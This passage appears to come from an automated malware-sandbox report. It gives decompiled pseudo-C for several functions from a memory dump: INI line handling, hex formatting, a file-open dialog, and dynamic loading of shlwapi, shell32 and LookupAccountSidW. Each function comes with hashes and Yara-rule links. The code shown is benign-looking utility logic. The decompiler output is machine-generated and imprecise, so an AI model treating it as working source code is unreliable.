wcschr.MSVCRT ref: 004073A4
wcschr.MSVCRT ref: 004073B2

Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D

Strings

", xrefs: 004073EE

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}

0x00401676
0x0040167e
0x0040168a
0x0040168c
0x00401690
0x00401691
0x00401696
0x0040169d
0x004016a2
0x004016aa
0x004016aa
0x004016aa
0x004016ad
0x004016ae
0x004016b3
0x004016b9
0x004016bb
0x004016bc
0x004016c1
0x004016c8
0x004016cd
0x004016ce
0x004016ea
0x004016ff
0x0040170c
0x004016d0
0x004016e3
0x004016e3
0x00401711
0x00401714
0x00000000
0x00401719
0x0040171c

APIs

_snwprintf.MSVCRT ref: 004016BC

Strings

Lines, xrefs: 00401696
Line%d, xrefs: 004016AE

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: Line%d$Lines
API String ID: 3988819677-2790224864
Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405132
0x00405135
0x00405139
0x0040513e
0x00405141
0x004051b3
0x00405143
0x00405145
0x00405147
0x0040514c
0x0040514e
0x00405151
0x00405151
0x0040515b
0x0040515c
0x0040515d
0x0040515e
0x0040515f
0x00405168
0x00405169
0x00405171
0x00405173
0x00405174
0x00405182
0x00405184
0x00405189
0x0040518c
0x00405194
0x00000000
0x00000000
0x00405196
0x0040519a
0x0040519b
0x004051a1
0x00000000
0x00000000
0x00000000
0x004051a1
0x004051a3
0x004051a3
0x004051a6
0x004051af
0x004051b0
0x004051b7

APIs

_snwprintf.MSVCRT ref: 00405174
memcpy.MSVCRT ref: 00405184

Strings

%2.2X , xrefs: 00405169

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}

0x004075bb
0x004075c2
0x004075c7
0x004075ca
0x004075cd
0x004075d8
0x004075e9
0x004075fc
0x00407600
0x00407601
0x00407606
0x00407609
0x0040760e
0x00407619
0x0040761e
0x0040761f
0x00407624
0x00407636

APIs

_snwprintf.MSVCRT ref: 004075E9
_snwprintf.MSVCRT ref: 00407609

Strings

%%-%d.%ds , xrefs: 004075DE

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}

0x00405080
0x00405086
0x0040508b
0x0040508e
0x00405091
0x00405097
0x0040509d
0x004050a4
0x004050ab
0x004050b2
0x004050b5
0x004050bc
0x004050cb
0x004050e0
0x004050cd
0x004050d1
0x004050dc
0x004050dc

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004050C3
wcscpy.MSVCRT ref: 004050D1

Strings

L, xrefs: 004050A4

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameOpenwcscpy
String ID: L
API String ID: 3246554996-2909332022
Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}

0x00409072
0x00409074
0x0040907d
0x00409086
0x0040908e
0x004090a5
0x004090a5
0x0040908e
0x004090ac

APIs

GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086

Strings

Y@, xrefs: 0040906D
LookupAccountSidW, xrefs: 0040907F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc
String ID: LookupAccountSidW$Y@
API String ID: 190572456-2352570548
Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040ad8c
0x0040ad93
0x0040ad95
0x0040ad9d
0x0040ada5
0x0040adb2
0x0040adb2
0x0040adb5
0x0040adbf

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

Strings

shlwapi.dll, xrefs: 0040AD87

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Load$AddressFreeProcmemsetwcscat
String ID: shlwapi.dll
API String ID: 4092907564-3792422438
Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669

Uniqueness

Uniqueness Score: -1.00%

Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}

0x00406597
0x00406598
0x004065a0
0x004065aa
0x004065ac
0x004065ac
0x004065bd

APIs

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 004065A0
wcscat.MSVCRT ref: 004065B6

Strings

_lng.ini, xrefs: 004065B0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamewcscatwcsrchr
String ID: _lng.ini
API String ID: 383090722-1948609170
Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}

0x0040ac59
0x0040ac60
0x0040ac68
0x0040ac6d
0x0040ac75
0x0040ac7b
0x00000000
0x0040ac7b
0x0040ac6d
0x0040ac80

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75

Strings

shell32.dll, xrefs: 0040AC5B
SHGetSpecialFolderPathW, xrefs: 0040AC6F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: SHGetSpecialFolderPathW$shell32.dll
API String ID: 946536540-880857682
Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}

0x00406670
0x0040667a
0x00406680
0x00406686
0x0040668b
0x0040668d
0x00406693
0x00406699
0x0040669f
0x004066a9
0x004066ac
0x004066af
0x004066b9
0x004066c7
0x004066d9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d5
0x004066db
0x004066dd
0x004066e0
0x004066e8
0x004066fa
0x004066ea
0x004066ea
0x004066ed
0x004066f0
0x004066f3
0x004066f6
0x004066f6
0x004066fc
0x004066fe
0x00406701
0x00406709
0x0040671b
0x0040670b
0x0040670b
0x0040670e
0x00406711
0x00406714
0x00406717
0x00406717
0x0040671d
0x0040671f
0x00406722
0x0040672a
0x0040673c
0x0040672c
0x0040672c
0x0040672f
0x00406732
0x00406735
0x00406738
0x00406738
0x0040673f
0x00406745

APIs

Part of subcall function 00404FA4: memset.MSVCRT ref: 00404FB2

??2@YAPAXI@Z.MSVCRT ref: 004066B9
??2@YAPAXI@Z.MSVCRT ref: 004066E0
??2@YAPAXI@Z.MSVCRT ref: 00406701
??2@YAPAXI@Z.MSVCRT ref: 00406722

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

0x004054ea
0x004054ec
0x004054f1
0x004054f4
0x004054f7
0x004054fa
0x004054fe
0x00405501
0x00405505
0x00405508
0x0040550b
0x0040551b
0x0040550d
0x0040550f
0x0040550f
0x00405521
0x00405527
0x0040552b
0x0040552e
0x0040553f
0x00405530
0x00405532
0x00405532
0x00405556
0x00405561
0x0040556e
0x00405571
0x00405578
0x0040557e

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

0x00405adf
0x00405ae6
0x00405af5
0x00405af6
0x00405afb
0x00405b00
0x00405b0a
0x00405b18
0x00405b19
0x00405b1e
0x00405b2c
0x00405b2d
0x00405b36
0x00405b37
0x00405b3c
0x00405b4a
0x00405b4b
0x00405b54
0x00405b55
0x00405b5a
0x00405b68
0x00405b69
0x00405b72
0x00405b73
0x00405b7b
0x00000000
0x00405b7b
0x00405b80

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
